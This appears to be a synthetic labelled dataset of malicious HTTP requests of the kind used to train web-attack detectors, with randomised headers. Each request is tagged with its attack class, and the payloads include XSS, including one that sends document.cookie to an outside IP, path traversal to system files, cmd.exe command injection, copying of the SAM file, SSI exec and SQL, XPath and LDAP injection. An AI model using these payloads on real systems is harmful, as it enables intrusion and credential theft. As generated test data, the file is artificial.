UA-OS: Windows 98
UA-Pixels: 0339x4942
Via: FTP/6.8 70.1.144.81, HTTP/3.9 168.125.121.166
Transfer-Encoding: deflate
Upgrade: tSnw/7.9, a5m/6.7, fogi0/2.6, alEi/8.0
Warning: 669 www.nfgu.shtml "3kai" 
X-Forwarded-For: 251.236.113.138
X-Serial-Number: 3865979
----: ------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48733
Start - Id: 47680
class: XSS
GET /aiXlYfjbW/bOYvbscript8mAf/Y_IPq.tiff?q55bBR2sYj=1&eerreanosnoc=qciaaed&e0=eaauut9nggn&qnieearhtxr=%3C%3Cscript%3E%5Balert++++%28%27raahcmjN6t%27%29%3B%5D%3C%2Fscript+++%3E&ts=44835&sm2hDsef=o4k%3F&Llorceni=5oe HTTP/1.1
Host: www.aseeebbibt.gov:6113
Connection: close
Accept: */*
Accept-Charset: windows-1252;q=0.2, iso-8859-7;q=0.5, iso-10646-ucs-2, windows-1251
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 236.44.137.116
Cookie: pjaswT2=196740605
Cookie2: $Version="699"
Date: Fri, 14 Jul 06 20:50:33 GMT
ETag: W/"B5.amP4RFDQ0Wn0"
Expect: 100-continue
From: 25osyn@hmnsy.org
If-Modified-Since: Sun, 16 Apr 06 24:27:24 CET
If-Unmodified-Since: Thu, 19 Mar 09 20:54:37 UTC
If-Match: "C1nWSvohfN1fmR4Gc"
If-None-Match: "pLvXZnxw1FRZ8P24f4Bj"
If-Range: Mon, 23 Apr 07 04:49:35 CET
Max-Forwards: 6
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic eWF0aTpuNkV0YUVr
Authorization: nemanc ahnau=ondhpsao
Range: 70-,2-,3-3356
Referer: http://hraotsti.cz/ssut82.gif
TE: trailers
Trailer: From
User-Agent: Mozilla/5.5 (Windows; U; Win 9x 8.3; e7-rt; rv:9.3.3) Gecko/43864826
UA-CPU: 68000
UA-Disp: 9242,0652,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 934x7117
Via: 0.4 0.114.127.182:98626
Transfer-Encoding: identity
Upgrade: gnEas/1.7, t6e4/9.4, 6sseci/3.1, daIRa/3.5, livoLt/6.1
Warning: 797 10.182.112.205:62 "mparhiqesWqMnqIet2" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47680
Start - Id: 39414
class: SSI
GET /iOwuBrNZVGaCgfkY4/jbst5OemFRecedmorste/mSLDzCMUKsb4jD14j/l5WgM@uP/sh0tr7Aenpctcdf7neI/Aqeyn/cAmzKwhereR.f/oIQ-7vj/Bz/gu1sh.gJ.js?tnuhpuseldar=n8TK2J&7phpWO=pEyer79noieYrsab&mfoxat1tGehnbtX=6&E815tase=t+ai&teoctmpO=zco63mj5&iapDR=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&ueeityaprhereoe=ghnQEmLG&sshpeEnAf=exec%3Ein&evfusjztso=0dtwoue7 HTTP/1.1
Host: www.elattGhsti.com
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: eea=o
Client-ip: 123.202.136.228
Cookie: E4tsa2=sO8Z;dsas=eole
Cookie2: $Version="891"
Date: Wed, 05 May 10 07:44:46 GMT
ETag: "gFaCTXTMM3uIhv8kx"
Expect: 100-continue
If-Modified-Since: Sun, 10 Feb 08 17:51:02 UTC
If-Unmodified-Since: Sat, 13 Sep 08 13:46:17 CET
If-Match: *
If-None-Match: "sGRfe6R-RBCty.SHb"
If-Range: Sun, 28 Feb 10 04:48:28 GMT
Max-Forwards: 289
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM TnN0dGVxMXJlaHFlYWFwYXdNUmxydGptb2F0dHRzYXN5
Authorization: Basic c2kyQjpnb3Zp
Range: 747370-38132,5734-
Referer: /zhtsGo/pWns0/hSLictdl/eraWhmaN/abuyaj.asmx
TE: gzip,trailers
Trailer: Via
User-Agent: is8Ncc8l (oVkmxvlejG)
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-Color: color8
UA-Pixels: 4162x972
Via: HTTP/5.4 www.eoyhfsio.gif, 0.8 112.119.63.196, 9.6 www.ei9d.html:16
Transfer-Encoding: gzip
Warning: 888 www.w8hrkSm.jpg "csloteoenmscieaoOe" "Tue, 16 May 06 20:10:54 GMT"
X-Serial-Number: 15636847207020
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39414
Start - Id: 47862
class: XSS
GET /tthti2adepi.php3?solnovetx9=36877586&Lldcay=k%26&oils8a=skrtrntleosiiWdcsh&AorcUoYiytlxf=pjfu&553N0Lwindow.openB=6%24fnn7W&n2xaeUretar=%3Ca+href+++%3D%22++about%3A%3Cs%26%2399%3Bript+++%3E%5Bwindow.open%28%27http%3A%2F%2F34.122.116.189%2Fieling.swf%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E%22++++%3E HTTP/1.0
Host: 33.117.165.97
Connection: keep-alive
Accept: audio/basic
Accept-Charset: hz-gb-2312;q=0.8, x-mac-chinesetrad, ks_c_5601-1987;q=0.5, macintosh;q=0.7, hz-gb-2312;q=0.4
Accept-Encoding: gzip, deflate;q=0.2
Accept-Language: *;q=0.3
Cache-Control: uytldd=a7tcah
Client-ip: 82.98.139.145
Cookie: 3evishneqeoen=1GbcbW_;ar=rgQa;r6IsGpyit1=sc7HPr;n9tehtue2etmeIn=u_5;oenejf=5572018
Cookie2: $Version="7"
Date: Sat, 30 Jul 05 24:52:56 UTC
ETag: "XpcaPWmdEo5d0C5fo2Ly"
Expect: teast5=egohe9Eo;ieasj=rsrnmih
From: 5uawbe5@Rlotbsnho.net
If-Modified-Since: Mon, 13 Oct 08 19:18:02 UTC
If-Unmodified-Since: Fri, 14 Sep 07 21:15:02 UTC
If-Match: "HZ4toqp_XQEkBE7tuQ"
If-None-Match: "A@QPoBzJdpQ4VjP.ATJF"
If-Range: "LT1pU7QIvOSM@Aaau"
Max-Forwards: 38
MIME-Version: 9.4
Pragma: eux8O='sbirs'
Proxy-Authorization: Basic Y3Jqbm0wYTpuMm9Zeg==
Authorization: ofnYi dkhs=1ratui
Range: 595606-7,222673-07
Referer: /pAeunh4p/Vesbmp0h/mfpi/lgetxnii.fgf
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.1 (X11; U; Open BSD i386 6.7; 6s-n4; rv:2.9.7) Gecko/20512229
UA-CPU: StrongARM
UA-Disp: 4309,162,32
UA-Pixels: 3411x5439
Via: 2.0 138.209.196.173:24563, sTrb/6.3 www.8xc5U.htm
Transfer-Encoding: imro; cisi=uaqirel
Upgrade: eceRm/0.3, e5aiw8/4.3, ahnzt/2.0
Warning: 420 163.148.232.91 "lraIhepmpe4o3l" 
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 110017564718
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47862
Start - Id: 45453
class: PathTransversal
GET /Y11Y@R5zFBZ/E2CBselectygpositionbodyFA/aeAvboStomra6cweomxt/potaaooskha1nOLhs/hB5r0tkIm/rhaimtrna7/i0hgldh-GHQTebV.exe?dynkDsimtnt=%5CV+%5C+&7ifionasEx=aibgsoundwm+gkew6yr%5D&wuilor=gd%3Cn2ns%26teud%2Bhomei%3B&gPFJBRdrop=u%5Cn4tihsnra&uutnhaetuh=..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&eda4eeshMmo4=2839976082&hmsesoso=11370888&s0=knrunaE&WasrbiasEixa=65&ndeeuoe=lt&jhia6tiiLu54ta=eexecN%27div HTTP/1.1
Host: www.msgd.ch
Connection: keep-alive
Accept: image/*, text/plain;q=0.2
Accept-Charset: *;q=0.1
Accept-Encoding: identity, deflate, compress, gzip;q=0.0
Accept-Language: *
Cache-Control: i='okqatao'
Client-ip: 8.98.194.17
Cookie: 0RjMpi=nrndim$=t;it=Xes;Et=)el0oIetae;hontorWani=225673;yias=60
Cookie2: $Version="1"
Date: Tue, 02 Nov 04 14:51:59 GMT
ETag: "60sCkeO-ydWfXL9-dVX-"
Expect: 100-continue
From: 4e5sen1a@anqM8msGct.ch
If-Modified-Since: Wed, 20 Apr 05 20:52:47 UTC
If-Unmodified-Since: Fri, 01 Sep 06 21:38:03 UTC
If-Match: "DC0vdWRkRIA2BEBp"
If-None-Match: "iYiinQsTzQeL28NRQ"
If-Range: "IjskpVEMQEW.hA1lqso3"
Max-Forwards: 27
Pragma: t=tR
Proxy-Authorization: Basic bnRhV29yaXQ6c2Rhcg==
Authorization: NTLM ZWF0ZHJpc25jcHdlbjJnc29kcG1rdVJpZW5laElsYXNJ
Range: -884,93-882862,81022-507
Referer: http://fttmi.ch/siet/1seegio/beuytne/ebefyh.dll
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/3.2 (Windows; U; WinNT 0.6; tN-t1; rv:4.6.2) Gecko/25192633
UA-Disp: 5353,5285,32
UA-OS: Windows 95
UA-Color: color8
Via: 4.8 www.ocwfdia7.jpg:7894, olkan/6.1 171.27.90.190
Transfer-Encoding: identity
Upgrade: ldu4yj/2.7, bmeN/8.1, deh/2.9
Warning: 895 95.106.146.142 "tark01bhtisa" 
X-Forwarded-For: 176.191.17.103
X-Serial-Number: 30742004292799508718
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45453
Start - Id: 41209
class: SqlInjection
GET /ikpcRu@g2Q-8QmkabY/pdlemrmeoox1rn/haoellhae/evuDfXt/eis.shtml?orihea=nauubuC%3AfS&kiey4ahshmsho=eGOt&QM-paoTge=ttt&d56smeiais=tpsPqP60-Ksg&agnermc=1&erCnrtpar=iRT-XF&i0=bioy+e+ol&_LE9iframekt=replace&n9mayI=m3a3CZYsT&daxbEsr=reln7mosoh&urtto=oeztli4e&.O_ywfK=ejpsh%24lflpeuai&O.gj=s%5CrrWr&6bgsoundE7d=21740610 HTTP/1.0
Host: www.1eeTsdeqle.st
Connection: in2u1e
Accept: image/jpeg;q=0.1, application/*, image/*
Accept-Charset: x-mac-ce
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 226.194.101.187
Cookie: 3hnchild0include=&;ntadTsdeXntxhx=4457536;det1neii0=Ewinnt;86ia=e5oirghr
Cookie2: $Version="19"
Date: Tue, 03 Feb 04 11:09:27 CET
ETag: W/"dL-DhQG3mf0HuKs"
Expect: iite=iaeqd;nirtl
From: ljOoeae@dayLl.cz
If-Modified-Since: Mon, 20 Jul 09 09:07:43 CET
If-Unmodified-Since: Mon, 14 Jan 08 05:06:08 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 31 Jul 07 08:17:54 UTC
Max-Forwards: 17
MIME-Version: 5.2
Pragma: eae7=lS7
Proxy-Authorization: muisi doaouyba=onhfte
Authorization: aEuSo 9dhabosO=esng
Range: 870-,33722-,80-34
Referer: http://2tvonti.gov/cltt9wt6/reoeeaar/3tLttnt.cfm
TE: trailers
Trailer: Expect
User-Agent: select   aaene from ALL_USERS
UA-CPU: MIPS
UA-Disp: 1760,871,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9140x4441
Via: 9.2 www.anaal.css, 5.5 www.iokse.shtml
Transfer-Encoding: identity
Upgrade: Nqj9e/1.6
Warning: 096 28.130.214.30:40463 "bwtv1" "Wed, 03 May 06 17:00:25 UTC"
X-Forwarded-For: 148.0.118.253
X-Serial-Number: 9505530425947859
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41209
Start - Id: 35110
class: SqlInjection
GET /tk/ctyeeze1asnrcf6hte/oFoE0p9pd/rW.UF5zXB6UV26u5XVLg/hrehaUenttiechnre/a-Ua_7qUzQUy/p5kN.exe?nnes=u7loincludete&D7Tv=7n&c7lthatrhtym=%5Bcien%29hnyphyiltx&oosoaNspahAt=iuENirCszq1&sstsu=%5Detlib6&tsetWnmniRssz=ahNnSaon&RQuRo0Q=48137239&rOtj=atan HTTP/1.0
Host: 44.113.153.62
Connection: iaSTIgyw
Accept: */*;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.3, gzip, gzip;q=0.0, gzip;q=0.5
Accept-Language: *
Client-ip: 92.253.144.130
Cookie: ss=956909;frruoredn='     OR    'ea'     <     'X
Date: Sat, 10 Dec 05 20:35:05 GMT
Expect: 100-continue
If-Modified-Since: Mon, 22 Oct 07 24:42:24 GMT
If-Unmodified-Since: Sat, 07 Jan 06 20:42:12 CET
If-Match: *
If-Range: Sat, 09 Jan 10 06:09:39 UTC
Max-Forwards: 49
Pragma: no-cache
Proxy-Authorization: 40is rg22aoe=iaendtt5
Authorization: NTLM ZGh3aHJuRGU2eGVkbzJTbXhkaGVkaG1MbnRGN2I1b3RodGVp
Range: 644787-
Referer: http://ew7c.biz/eciczhz/zshp2Th/ex8rnr6j.doc
TE: trailers,trailers
User-Agent: Mozilla/2.9 (Machintosh; U; Mac OS X 8.9; r8-1n; rv:6.5.7) Gecko/57292596
Via: HTTP/8.6 172.20.253.88

null

End - Id: 35110
Start - Id: 35646
class: XPathInjection
GET /i1ihaNu4V7tdOG/EQALXNV.php4?ta=n%3D-mln74cTee&bl1Cte6hree=4wp-processing-instructione+e%3Bto0devaldetaL%3B&mit7pnh0pyi5sa=971&t7dtePvh=iIi&nmdreeee8kH0nda=58525&rEenPaeh=dXtes0KAb&8daiiMtp=scopyn%7E%3Cinclude3&0sfmogo1=c%24Pu&e7mkfhsshe9niNp=zi41n%27++or+++++T%2Fut%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D8%5D+or++++%27stopd%27++++%3D+++%27&xbR-=eoaooedaoriqd&u9xE4JNz2R=ofo HTTP/1.1
Host: 67.163.172.134:0954
Connection: avumeJ
Accept: application/rtf, text/plain;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=04
Client-ip: 27.218.117.196
Cookie: ustiOl5ae1re6=48253479;lisxl1= eoee;citlkrotetlo=1861;evtgn=zmdocumentewinnt:lnseoe<qd;yOH63X=fnhenie5wnr7wflygs;geNS8a12enernd=mWD6DZNDg-7
Cookie2: $Version="053"
Date: Fri, 02 Dec 05 15:29:45 UTC
ETag: "M3ZVH_ldXyZcfC-"
Expect: linOta
From: 8oiisi@uknxnhisdr.org
If-Modified-Since: Mon, 12 Sep 05 21:13:01 CET
If-Unmodified-Since: Mon, 24 Jul 06 16:14:41 UTC
If-Match: *
If-None-Match: "XhxisIYvQNy3G_HB0.A0"
If-Range: *
Max-Forwards: 4748
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: NTLM bHRscTVzaWF1eGVBcmZ3Y2xUYm5uY2Zzbndvc3NvaWZ1dHRvUmh5ZG15
Range: -38,162-85,-031
Referer: /2eediIu/nridlet/eIsb.nsf
TE: chunked;q=0.8,chunked,gzip;q=0.4
Trailer: Range
User-Agent: Mozilla/0.3 (compatible; ahiy4ezr2; Win98; Idtay6nst; ehtto; oemtyun6)
UA-CPU: StrongARM
UA-Disp: 458,730,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3327x2128
Via: 2.6 100.197.18.16, 0.4 201.148.135.80
Transfer-Encoding: identity
Upgrade: zizt/1.0, Nfsr/7.3, araJv/5.9, 0athyr/9.5, 7a2ey/9.9
Warning: 083 51.53.107.61:3990 "ittpbttTz" "Fri, 23 May 08 24:15:13 GMT"
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 9747150150274
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35646
Start - Id: 44432
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.1
Host: www.tsueegtez0.it:493
Connection: keep-alive
Accept: */*
Accept-Charset: gb2312
Accept-Encoding: *;q=0.5
Accept-Language: sRr-d, iRe-csio9edp
Cache-Control: min-fresh=368
Client-ip: 27.105.36.250
Cookie: s7Eehtacces=qnoe0dIEgro/\U;v78qeOG=0it;hcavT8pilWaqT=u$l$hotmailseusrhks;rltnrs99sloatea=xsEniw6L
Cookie2: $Version="74"
Date: Wed, 13 Apr 05 04:30:00 CET
ETag: "2tnZ37xD4wGUw-x"
Expect: 100-continue
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Fri, 18 Feb 05 24:23:10 GMT
If-Unmodified-Since: Sat, 13 Oct 07 16:08:45 UTC
If-Match: *
If-None-Match: "zyrhq9-I2ZwYaJGgyNd"
If-Range: "oS_d5-ZNmjCPGVHb"
Max-Forwards: 6707
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM Y0xsZGlpbnRudWkyaTIxVW8yZnRla2lpdEd6cG9yZXN0
Authorization: Digest cnonce="secl"
Range: 6-02287,72753-
Referer: http://eqnrahe.org/nafrmr4a/Duyy3ae/aiiegoqf.asp
TE: deflate;q=0.1,chunked
Trailer: Proxy-Authorization
User-Agent: dooo/0.5.8
UA-CPU: Sparc
UA-Disp: 712,4716,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 053x237
Via: 8.5 66.3.123.210, 2.7 249.88.93.53
Transfer-Encoding: gzip
Upgrade: esoj5m/0.8
Warning: 041 www.nmtu.css:96410 "tmhhadncfjtereqA" "Mon, 28 Sep 09 17:32:04 UTC"
X-Forwarded-For: 1.199.151.97
X-Serial-Number: 42253
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 44432
Start - Id: 43930
class: OsCommanding
GET ..�../..�../mssql7/install/pubtext.bat" & dir c: .exe? HTTP/1.1
Host: www.ihitWey5s.fr
Connection: 6e4qent
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Muco-nrtt5i
Cache-Control: min-fresh=465
Client-ip: 234.178.200.227
Cookie: e7aisVn=2+likes;i7uenEDwtton=Aa;sanitoamo88fsa=iHN@vJ0D;djaduoilsh=itdc;Pdrop7cQIE_4=2129515;dsnMt=4722494930
Cookie2: $Version="25"
Date: Fri, 08 Sep 06 12:15:38 GMT
ETag: W/"Rnf8Nocsx.lyafl8cCYu"
Expect: Hqscnnpi
From: lwml7nN@otm7kisnc.cz
If-Modified-Since: Tue, 03 Nov 09 17:02:38 CET
If-Unmodified-Since: Mon, 12 Apr 10 12:24:17 GMT
If-Match: *
If-None-Match: "ysMR.zfJLfC@VBlM"
If-Range: Fri, 11 Jun 04 01:57:49 GMT
Max-Forwards: 2238
MIME-Version: 3.4
Pragma: enlta8='a8fi2M'
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: ohlp koeeoec=6ohc
Range: 080946-24031
Referer: /mtwnr/hrfthd.mdb
TE: gzip
Trailer: If-None-Match
User-Agent: scoideoaR3qspretyek
UA-CPU: StrongARM
UA-Disp: 9151,3536,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 428x0275
Via: 1sai2/3.1 105.125.16.244, HTTP/3.1 68.249.181.44, 4.0 www.alnl.css:41524
Transfer-Encoding: deflate
Upgrade: ehl/0.1, iwT/4.5, eeajn/7.4
Warning: 590 204.118.91.69 "eitd3dnkcep3Sina3" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43930
Start - Id: 42949
class: OsCommanding
GET /o0v/ZeYXp0PXR/uidet0ueoLei4g/Crnr/W4i-OAReE/xhobject6-h._J/6uAaexecV/s1Ezo/9kvconnectsbrwhereunionhbBu/C4v/sxsj5RbDL5s.gif?lLeoono=n%40Qxa3Kwbw&mRilugdw9R=dcataao%7EformitDqotmtn38&eKirh0sdnaa=3&vfv=whiiscnomehdmvrts&hseyrstKWh=eganMntign&fs=475&o8Nhemoeudt=+%5Br&ytsrr2afrmo=shtpassdsgcmde07&raGiO8roofuoatt=0857&b1gt=a9_HcxeLN.x&ehaE=nfi%40wgetimWi%5Dr5Et+a-+n%40&FwgetPRhavingdGp57U=mel HTTP/1.0
Host: www.mLuhQ1iu.cz:80
Connection: close
Accept: text/*, image/*, application/rtf;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 152.219.121.215
Cookie2: $Version="8"
Date: Tue, 07 Nov 06 16:33:26 GMT
ETag: W/".mti5B@ymIz3s@wO9Zf"
If-Unmodified-Since: Tue, 15 Sep 09 21:37:58 GMT
If-None-Match: *
Authorization: Basic aW80ZWNjSHM6N3dleHhlbk0=
Referer: /ntOsA/s2naM.php4
TE: trailers
User-Agent: /bin/ps%00 |
Transfer-Encoding: gzip
Upgrade: txnpO/5.7, gd5npo/8.6, Tyt/7.5

null

End - Id: 42949
Start - Id: 42502
class: SqlInjection
GET /ZKIRscript/esZ56thLHGErY4D/autoexecrrmeta8Xec4/hFe4tedidz/cLnu/Kcauohssa5isdethlle/nsLXV.FG/ctm/s9ooir8oi1nebxd1t/tnjJnUSiFiv-HrpL/enifpikeg5eaon.html?ollbubrO=%29eoboot.ini9s%2Fadmin&0a8yFrAnMj6o=433&0Ilugefask2z0l=%27+++OR+++%27lsnlemZ2%27++++%3D%27&huKyeshaEnfo=9nfi&fdose=eMZJXLkdl_.&unk4sorn=%3Asbody&hY3houjcat=41&twm8j=9bh%40bnennchreval HTTP/1.1
Host: 219.179.58.236
Connection: l0alNq
Accept: video/*
Accept-Charset: x-mac-japanese;q=0.4
Accept-Encoding: 
Accept-Language: qsdw04yo-sv, l0hSe2-ist2cea;q=0.2
Cache-Control: only-if-cached
Client-ip: 59.62.46.157
Cookie: om2bon2eaerebn=l;eroa8rgterhheo=asdhETiomOshv;wnlraaAfsEnetnh=e@5lB.N@7e;oeebhd=6434;IgVh6S5openB6xh=ire0d
Cookie2: $Version="85"
Date: Fri, 04 May 07 13:49:07 UTC
ETag: W/"Meb@PuEcS0MSg5w"
Expect: eb8e
From: sheo@RafNi.uk
If-Modified-Since: Wed, 22 Dec 04 20:34:49 CET
If-Unmodified-Since: Mon, 24 Mar 08 23:46:09 CET
If-Match: "L2Vij3R8ukgc0zgU"
If-None-Match: *
If-Range: Tue, 04 Jul 06 22:26:12 CET
Max-Forwards: 546
MIME-Version: 9.9
Pragma: n73wWo=Otd2do
Proxy-Authorization: Ebra8 aiKrw2u=2h7Ged
Authorization: Digest uri=http://noqluar.com/ntodeig/dth6.jpg
Range: 16802-
Referer: http://so2xrict.gov/iTsfz7a/esta/FoeOg.nsf
TE: gzip;q=0.7,trailers
Trailer: Max-Forwards
User-Agent: oAs5euela0d
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 733x829
Via: xsshdy/4.9 www.rager.gif
Transfer-Encoding: compress
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 504 127.15.72.187:71097 "tehsu6o03" "Sat, 20 Aug 05 24:15:38 GMT"
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 171208894897748
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42502
Start - Id: 42903
class: OsCommanding
GET /2k/ldo/ctdsesr9sdodiot9oho/s1/bodyperl-GzQorLs3nid@y/gjeYplEbLL0/td1o13s1bcrmgee7atr/surriaqs/fI4raEnehAesuJmi/fp@./6union@tTkF@.jpeg?Jvarz0BugsFpKw=97342&rn_sMD=034811&hsregae=195.162.215.84++%7C+copy+c%3A%5Cwinnt%5Crepair%5Csam._+c%3A%5Cinetpub%5Cwwwroot%5Csam.ddd HTTP/1.0
Host: www.tees.fr
Connection: keep-alive
Accept: */*
Accept-Encoding: *
Accept-Language: 81seils-ggekAio;q=0.5, tPi-ne, 8-yylnsd;q=0.0, nettznn-k4a;q=0.1
Cache-Control: n=iieug
Client-ip: 96.179.106.38
Cookie: lhbheo=fDEtqMbzY;3te=ab0;Naetmg8d=8266;omm2Pa1ctteoD=98489;de7l1ltmsDe=s2Jd;q42a6SQand=ore
Date: Tue, 24 Jun 08 19:25:30 UTC
ETag: "RN8ZpOHkZT7@-j6HbF"
Pragma: De2l='8ia'
Referer: /6jyeiewd/t8lta6sc/dJ8e.pdf
User-Agent: 7ustd/8.8.8
Via: 2.6 www.gzaMr1dg.shtml:2
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42903
Start - Id: 37434
class: LdapInjection
GET /7kcHeEu8Uk9xXItILip/mw3952C5.82KLc-G89t/lyewnagn/0ErL/dEN8/1n/t0/s3q8gLgQda5C/oTnahjPrbiutsberfiet/eDY10e7RE4x.mdb? HTTP/1.0
Host: 161.175.203.19:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-greek;q=0.4, x-mac-turkish;q=0.6
Accept-Encoding: 
Accept-Language: tpciulca-hI0eU;q=0.8, tcaaa-Rs;q=0.0
Cache-Control: no-transform
Client-ip: 90.185.154.16
Cookie: yitsw=)    (  |(tsfrl=ar*)
Cookie2: $Version="7"
Date: Tue, 27 Jun 06 09:43:29 GMT
ETag: W/"MN_sySINsXDW-1mHu"
Expect: 100-continue
From: arSeni@esqqy2etgc.cz
If-Modified-Since: Tue, 29 Dec 09 07:26:00 UTC
If-Unmodified-Since: Tue, 25 Oct 05 24:01:17 UTC
If-Match: "FbUpknMip@.VZNd4Ryp8"
If-None-Match: *
If-Range: Sun, 04 Nov 07 14:09:13 CET
Max-Forwards: 19
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM bjRpdGJIOWFlczZmdHBubnJvZHJ2ZWVvMXM5bmFuaGlqZW50b2R4Y2Y5OW9jVw==
Authorization: NTLM YmR0VHRnZTh2YmVkRGVzNm5uWGF4dHhyZHJybmhubHJiZW90emQ0cg==
Range: -35593,-698,-52148
Referer: http://s3r0tvA.biz/omosdc/tvere.swf
TE: chunked;q=0.5
Trailer: Connection
User-Agent: ahfsehoytr8es
UA-CPU: 68000
UA-Disp: 7901,3624,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 7873x595
Via: FTP/0.1 97.232.105.112
Transfer-Encoding: identity
Upgrade: tsUg/3.0, gimoE/9.9
Warning: 316 149.141.160.251 "ctwienrasegedeheetsm" 
X-Forwarded-For: 22.60.158.248
X-Serial-Number: 662203541237
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 37434
Start - Id: 40195
class: SSI
GET /oIr7/0aoaeateaTtwwietam/6ullNvtxhoet/aQ.iheYqEHHVSW/89olIiellet2M/e6eon7z1ionl/pRecNLh/mYM/tXogRiycqQBEEW_PIo1.cgi?e7psude=+s&RTRexec5cEo=%3C%21++%23%3C%21--+++%23exec++++cmd%3D%22id%22--%3E&II3liNhFf_Ga=0178571 HTTP/1.0
Host: www.issq5.it:880
Connection: reoo9eji
Accept: video/quicktime, image/*;q=0.1, video/mpeg;q=0.3
Accept-Charset: iso-8859-1, x-mac-hebrew, euc-jp
Accept-Encoding: deflate;q=0.9, gzip;q=0.5
Accept-Language: iege-Ehfdn;q=0.7
Cache-Control: only-if-cached
Client-ip: 75.82.91.174
Cookie: ies=selectpassthru;r.f.51W0O=sie;afDbo9p=69970;n1tjwoszs=oyrww
Cookie2: $Version="6"
Date: Sun, 23 May 04 06:43:55 CET
ETag: "@BYOpdJ6S6t7PhQHXVU"
Expect: 100-continue
From: beevy@rdaeiuersl.de
If-Modified-Since: Wed, 06 Sep 06 01:53:09 CET
If-Unmodified-Since: Sat, 17 Nov 07 11:48:55 GMT
If-Match: "JbPwMYkc6OAZuD3FT6NJ"
If-None-Match: *
If-Range: Tue, 19 Dec 06 11:39:40 UTC
Max-Forwards: 9706
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest cnonce="ttma1tHn"
Range: -8389
Referer: http://www.HgnXio.cz/ienao3lt/swte/remotr/3yHhEeyk.cgi
TE: gzip;q=0.2,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: r6gSWu http://www.lsnSo1.ch
UA-CPU: 68000
UA-Disp: 134,343,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9646x716
Via: 0.6 40.35.35.122, 0.7 3.184.154.12, FTP/7.3 www.b1launrl.jpg:7515
Transfer-Encoding: nkz86; fosil=losAnh
Upgrade: aiaEi/3.2, nenl/7.3
Warning: 193 214.100.46.242 "rhape" 
X-Serial-Number: 5910838983690
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40195
Start - Id: 39698
class: SSI
GET /l7is/gJ/nnSZ4QMlZoR3PMb8LhQq/EJ7a/6rthnia/ltvnicsdAogEupAdswf/bslh7-_kip/oCo1tFc/hijobe2eeeareonli/T8T81mpelin4CzN/eeigi34eexbthtfT/ria1efh0ar2rn2isbvkt.php3?wenbTsro=%3C%21--+%23include++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++--%3E&8Ip7=It HTTP/1.1
Host: 90.27.194.10:0938
Connection: close
Accept: image/*;q=0.1, text/*
Accept-Charset: windows-1257, iso-8859-8, iso-2022-kr;q=0.5, koi8-r;q=0.0, us-ascii;q=0.4
Accept-Encoding: compress, gzip
